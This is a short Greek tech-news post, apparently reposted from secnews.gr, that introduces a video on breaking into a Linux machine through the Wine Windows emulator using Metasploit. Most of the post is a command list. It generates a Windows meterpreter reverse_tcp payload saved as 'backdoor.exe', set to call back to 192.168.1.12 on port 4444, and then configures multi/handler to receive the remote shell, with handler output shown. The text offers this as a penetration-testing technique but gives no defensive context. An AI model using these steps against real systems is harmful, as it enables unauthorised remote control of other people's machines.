Αποκτήσετε πρόσβαση μέσω μιας εφαρμογής προσομοίωσης Windows στο Linux Metasploit

Το Metasploit είναι ένα υπέροχο εργαλείο για penetration testing, καθώς περιλαμβάνει μια βάση με exploits για την παραβίαση λειτουργικών συστημάτων, πολύ χρήσιμη για ειδικούς ασφάλειας.

 
Παρακάτω θα παρακολουθήσετε ένα βίντεο στο οποίο εμφανίζονται τεχνικές παραβίασης για λειτουργικό σύστημα Linux. Στο βίντεο θα μάθετε πως μέσω μιας εφαρμογής προσομοίωσης Windows, μπορείτε να αποκτήσετε πρόσβαση σε ένα μηχάνημα που χρησιμοποιεί Linux.

 
Η εφαρμογή αυτή ονομάζεται wine και θα εντοπίσουμε παρακάτω τις ευπάθειες που διαθέτει, οι οποίες μπορούν να γίνουν εκμεταλλεύσιμες έτσι ώστε να παραβιάσουμε ένα μηχάνημα Linux.


Εντολές:

• root@bt:~# msfpayload windows/meterpreter/reverse_tcplhost=192.168.1.12 lport=4444 X > backdoor.exe
• Created by msfpayload (http://www.metasploit.com).
• Payload: windows/meterpreter/reverse_tcp
• Length: 290
• Options: {«lhost»=>»192.168.1.12″, «lport»=>»4444″}
• Metasploit commands
• msf> use multi/handler
• msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
• payload => windows/meterpreter/reverse_tcp
• msf exploit(handler) > set lhost 192.168.1.12
• lhost => 192.168.1.12
• msf exploit(handler) > set lport 4444
• lport => 4444
• msf exploit(handler) > exploit
• [*] Started reverse handler on 192.168.1.12:4444
• [*] Starting the payload handler…

Πηγή:secnews.gr

Ακολουθήσετε το Tech News in Greek στο Facebook, X (Twitter).

Ακολουθήσετε το Tech News in Greek στο Google News για να μαθαίνετε άμεσα όλα τα νέα.